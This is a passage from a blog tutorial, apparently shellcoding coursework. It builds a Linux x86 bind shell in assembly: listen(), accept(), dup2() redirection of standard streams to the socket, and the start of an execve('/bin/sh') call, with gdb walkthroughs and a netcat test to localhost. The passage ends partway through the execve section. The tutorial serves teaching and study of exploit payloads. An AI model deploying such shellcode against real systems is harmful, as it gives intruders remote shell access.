src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419203221.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>listen()<\/strong> function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint listen(int sockfd, int backlog);\n<\/pre><\/div>\n\n\n<p>Querying the socketcall documentation in net.h, we note that the socketcall number for <strong>listen()<\/strong> has a value of <strong>4<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419203537.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>listen()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The sockfd argument is a file descriptor that refers to the socket we are going to listen on.<\/p>\n\n\n\n<p>This value can be set to the file descriptor of the previously established socket. 
Following the previous call to <strong>bind()<\/strong>, the socket descriptor was saved to the <strong>EDX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">backlog<\/h4>\n\n\n\n<p>The backlog argument refers to the maximum number of pending connections for the socket.<\/p>\n\n\n\n<p>In case a connection request is made when this number is exceeded, the client will receive an <strong>ECONNREFUSED<\/strong> response.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>listen()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Arguments<\/td><td>-<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of socket connections<\/td><td>2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to set up the listener, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling listen()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - listen 
(4)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - listen arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the values of <strong>backlog<\/strong> and <strong>sockfd<\/strong> to the stack in reverse order.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - stored in EDX after the call to <strong>bind()<\/strong>. We will push this value to the stack for use with <strong>listen()<\/strong>.<\/li>\n\n\n\n<li>backlog - arbitrary, we set this to 2 (0x2).<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>listen()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for listen<\/td><td>0x4<\/td><\/tr><tr><td>listen<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>listen<\/td><td>backlog<\/td><td>Maximum number of pending connections<\/td><td>0x2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>listen()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_listen:\n\n        ; EAX already holds 0 (the return value of a successful bind()), so only al needs the syscall number 102 in hex.\n        mov al, 0x66\n\n        ; EBX still holds 0x2 from the bind() call with its upper bytes clear, so setting bl to 0x4 selects listen()\n        mov bl, 0x4\n\n        ; Push arguments to the stack in reverse order for the call to listen()\n        push byte 0x2\n        push edx\n\n        ; Set ECX to the top of the stack to point to args\n        mov ecx, esp\n\n        ; Execute listen() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator 
has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">listen() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>listen()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420203800.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Defining hook-stop for the scope of the <strong>listen()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049031\n&gt;end\n<\/pre><\/div>\n\n\n<p>The syscall is set up for the call to <strong>listen()<\/strong>, having moved <strong>0x4<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204040.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The values for the backlog and socket descriptor are pushed to the stack, where <strong>ECX<\/strong> will point to them.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204142.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the correct values as per the function arguments for <strong>listen()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204406.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We note that the value of the <strong>EAX<\/strong> register, which stores the return value is <strong>0<\/strong>, indicating a successful call to <strong>listen()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420204506.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we look at the <strong>accept<\/strong> syscall, which is the final parameter we need to implement the initial TCP bind connection.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Accepting a connection<\/h3>\n\n\n\n<p>Next, we look at the call to the <strong>accept()<\/strong> function, which is used to accept a connection request made by a client.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419210310.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>accept()<\/strong> function has the following header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);\n<\/pre><\/div>\n\n\n<p>Querying the socketcall documentation in net.h indicates that the socketcall for <strong>accept()<\/strong> has a value of <strong>5<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419210458.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() 
arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>accept()<\/strong> function.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">sockfd<\/h4>\n\n\n\n<p>The&nbsp;<strong>sockfd<\/strong>&nbsp;parameter is the file descriptor of the listening socket. This is the same descriptor we passed to the&nbsp;<strong>listen()<\/strong>&nbsp;function and, following that syscall, it is still stored in the EDX register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420202303.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addr<\/h4>\n\n\n\n<p>The addr argument is a pointer to a sockaddr structure. This structure is filled in by the operating system with the address of the connecting peer. As we do not need the client address, it does not need to be provided by the programmer and can be passed as NULL.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">addrlen<\/h4>\n\n\n\n<p>The addrlen argument is a pointer to the size of addr. 
This value is also populated by the OS so will not be provided by the programmer.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>accept()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>call<\/td><td>Syscall number<\/td><td>-<\/td><\/tr><tr><td>socketcall<\/td><td>args<\/td><td>Arguments<\/td><td>-<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>host_sockid<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Socket address family, host IP address and port<\/td><td>NULL<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Size in bytes of addr<\/td><td>NULL<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>Now that we know the initial values to accept connections, we can implement this in assembly.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling accept()<\/h3>\n\n\n\n<p>In case of our system call to <strong>socketcall()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (102)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - call argument - accept (5)<\/li>\n\n\n\n<li><strong>ECX<\/strong> - *args - accept arguments<\/li>\n<\/ul>\n\n\n\n<p>To begin, we must push the values of addrlen, addr and sockfd to the stack in reverse order. The values of addrlen and addr will be NULL.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>sockfd - stored in EDX after call to <strong>listen()<\/strong>. 
We will push this value to the stack to be used once again.<\/li>\n\n\n\n<li>addr - NULL<\/li>\n\n\n\n<li>addrlen - NULL<\/li>\n<\/ul>\n\n\n\n<p>The overall argument structure for calling <strong>accept()<\/strong> will be as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Description<\/th><th>Value<\/th><\/tr><\/thead><tbody><tr><td>socketcall<\/td><td>syscall<\/td><td>Syscall value for socketcall<\/td><td>0x66<\/td><\/tr><tr><td>socketcall<\/td><td>call<\/td><td>Socketcall value for accept<\/td><td>0x5<\/td><\/tr><tr><td>accept<\/td><td>sockfd<\/td><td>Socket file descriptor<\/td><td>0x3<\/td><\/tr><tr><td>accept<\/td><td>addr<\/td><td>Pointer to sockaddr_in structure<\/td><td>0x0<\/td><\/tr><tr><td>accept<\/td><td>addrlen<\/td><td>Length of addr in bytes<\/td><td>0x0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">accept() assembly code<\/h3>\n\n\n\n<p>The assembly code for the <strong>accept()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_accept:\n\n        ; Clear EAX register and set al to syscall number 102 in hex.\n        mov al, 0x66\n\n        ; Clear EBX register and set bl to 0x5 for accept()\n        mov bl, 0x5\n\n        ; Clear ECX and push arguments for call to accept()\n        xor ecx, ecx\n        push ecx;               addrlen - NULL\n        push ecx;               addr - NULL\n        push edx;               sockfd - stored in EDX\n\n        ; Set ECX to stack for call to accept()\n        mov ecx, esp\n\n        ; Execute accept() syscall\n        int 0x80\n<\/pre><\/div>\n\n\n<h3 class=\"wp-block-heading\">accept() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>accept()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 
decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420205927.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We once again define our hook-stop for the scope of the <strong>accept()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x804903c\n&gt;end\n<\/pre><\/div>\n\n\n<p>The syscall is set up for the call to <strong>accept()<\/strong>, having moved <strong>0x5<\/strong> to the <strong>bl<\/strong> register:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The arguments to <strong>accept()<\/strong> are then pushed to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210336.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>ESP<\/strong> value is moved to the <strong>ECX<\/strong> register, so that <strong>ECX<\/strong> is pointing to the addr values as per the function arguments for&nbsp;<strong>accept()<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210539.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This time when the syscall is made, the program appears to hang. 
This is because after the call to <strong>accept()<\/strong> the program awaits a connection from a client.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210640.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In a separate terminal, we can use netcat to connect to localhost on TCP port 4444.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nnc localhost 4444\n<\/pre><\/div>\n\n\n<p>When we do this and check gdb again, we see that the program continues execution and finishes.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210736.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The EAX register containing the return value of the call to <strong>accept()<\/strong> is populated with the value <strong>0x4<\/strong>, which corresponds to the socket descriptor for the connected client socket.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210811.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Making the shell interactive<\/h3>\n\n\n\n<p>Now that we have a working bind shell implementation in assembly, we next work on making it interactive.<\/p>\n\n\n\n<p>The example C program does this by setting the file descriptors for the client socket to the STDIN, STDOUT and STDERR on the host system.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/\/ Duplicate file descriptors for STDIN, STDOUT and STDERR \n    dup2(client_sockid, 0); \n    dup2(client_sockid, 1); \n    
dup2(client_sockid, 2); \n<\/pre><\/div>\n\n\n<p>The manual entry for this functionality is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419213155.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The <strong>dup2()<\/strong> function, which is used by the C program, has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint dup2(int oldfd, int newfd);\n<\/pre><\/div>\n\n\n<p>To locate the syscall number for <strong>dup2()<\/strong>, we can query unistd_32.h and grep for the function name like so:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ncat  \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h | grep dup2\n\n#define __NR_dup2 63\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419214121.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We determine the syscall number of <strong>dup2()<\/strong> is <strong>63<\/strong>, which in hex is <strong>0x3F<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() arguments<\/h3>\n\n\n\n<p>Next, we look at each of the parameters to the <strong>dup2()<\/strong> function.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">oldfd<\/h4>\n\n\n\n<p>The oldfd argument is the file descriptor to be duplicated. In this case, we set it to the file descriptor of the connected client socket.<\/p>\n\n\n\n<p>
Following the call to&nbsp;<strong>accept()<\/strong>, the client socket descriptor is returned in the <strong>EAX<\/strong> register.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420210811.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h4 class=\"wp-block-heading\">newfd<\/h4>\n\n\n\n<p>The newfd argument is the file descriptor we are redirecting into the socket.<\/p>\n\n\n\n<p>As we are aiming to redirect STDIN, STDOUT and STDERR to the socket connection, this value will be set to 0, 1 and 2 on each subsequent syscall.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() argument structure<\/h3>\n\n\n\n<p>A breakdown of the arguments to <strong>dup2()<\/strong> is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table><thead><tr><th>Syscall<\/th><th>Argument<\/th><th>Man Reference<\/th><th>C Code Reference<\/th><\/tr><\/thead><tbody><tr><td>dup2<\/td><td>oldfd<\/td><td>Client socket file descriptor<\/td><td>client_sockid<\/td><\/tr><tr><td>dup2<\/td><td>newfd<\/td><td>New file descriptor<\/td><td>0, 1 and 2<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Calling dup2()<\/h3>\n\n\n\n<p>In case of our system call to <strong>dup2()<\/strong>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>EAX<\/strong> - system call number (63)<\/li>\n\n\n\n<li><strong>EBX<\/strong> - oldfd, which is the client socket descriptor returned by the call to <strong>accept()<\/strong><\/li>\n\n\n\n<li><strong>ECX<\/strong> - newfd, which will iterate over 0, 1 and 2 for STDIN, STDOUT and STDERR<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() assembly code<\/h3>\n\n\n\n<p>The 
assembly code for the <strong>dup2()<\/strong> function is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; title: ; notranslate\" title=\"\">\n_dup2:\n\n        ; Push the EAX register containing the socket file descriptor returned from accept()\n        push eax\n\n        ; Clear EAX register and set al to syscall number 63 in hex.\n        mov al, 0x3f\n        pop ebx;                POP socket file descriptor into EBX for dup2 syscall\n        xor ecx, ecx;           Clear ECX register for initial redirection of STDIN (0)\n        int 0x80;               Execute dup2() syscall\n\n        ; Set dup2() syscall for STDOUT\n        mov al, 0x3f\n        mov cl, 0x1\n        int 0x80\n\n        ; Set dup2() syscall for STDERR\n        mov al, 0x3f\n        mov cl, 0x2\n        int 0x80\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">dup2() analysis<\/h3>\n\n\n\n<p>We can now step through our implementation of <strong>dup2()<\/strong> using gdb.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211507.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Defining hook-stop for the scope of the <strong>dup2()<\/strong> assembly code:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n(gdb) define hook-stop\nType commands for definition of &quot;hook-stop&quot;.\nEnd with a line saying just &quot;end&quot;.\n&gt;print\/x $eax\n&gt;print\/x $ebx\n&gt;print\/x $ecx\n&gt;print\/x $edx\n&gt;x\/4xw $esp\n&gt;disassemble 0x8049049\n&gt;end\n<\/pre><\/div>\n\n\n<p><strong>Note:<\/strong> We once again have to initiate a client connection in order to resume execution after the call to <strong>accept()<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img 
decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211636.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To begin, the value of <strong>EAX<\/strong>, which contains the connecting client socket descriptor is pushed to the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211747.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>As the syscall number for <strong>dup2()<\/strong> will need to occupy <strong>EAX<\/strong>, we initially pop the value of the client socket descriptor into the <strong>EBX<\/strong> register to save it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420211930.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We prep the <strong>EAX<\/strong>, <strong>EBX<\/strong> and <strong>ECX<\/strong> registers for the syscall to duplicate <strong>STDIN<\/strong>, set in <strong>ECX<\/strong> as the value <strong>0x0<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212045.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We repeat the setup to perform the syscall for <strong>STDOUT<\/strong>, with <strong>ECX<\/strong> set to <strong>0x1<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212153.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Finally we perform the syscall for <strong>STDERR<\/strong>, with <strong>ECX<\/strong> set to <strong>0x2<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" 
src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212300.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>On each subsequent syscall, the <strong>EAX<\/strong> register returns the value of the new file descriptor (0 for STDIN, 1 for STDOUT, 2 for STDERR).<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420212344.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Getting a shell<\/h3>\n\n\n\n<p>Now that we have a working bind connection over TCP which performs proper I\/O redirection, we can implement a shell.<\/p>\n\n\n\n<p>Once the client connects to our waiting socket, the program needs to execute a shell program such as <strong>\/bin\/sh<\/strong> to spawn a shell.<\/p>\n\n\n\n<p>To do this, we are going to use the <strong>execve()<\/strong> syscall.<\/p>\n\n\n\n<p>As per the C shellcode, the <strong>execve()<\/strong> call is as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\n\/\/ Execute \/bin\/sh \nexecve(&quot;\/bin\/sh&quot;, NULL, NULL);\n<\/pre><\/div>\n\n\n<p>The manual entry for the execve functionality is as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419222245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The execve function has the following function header:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint execve(const char *pathname, char *const argv&#x5B;], char *const envp&#x5B;]);\n<\/pre><\/div>\n\n\n<p>To locate the syscall number for <strong>execve()<\/strong>, we can 
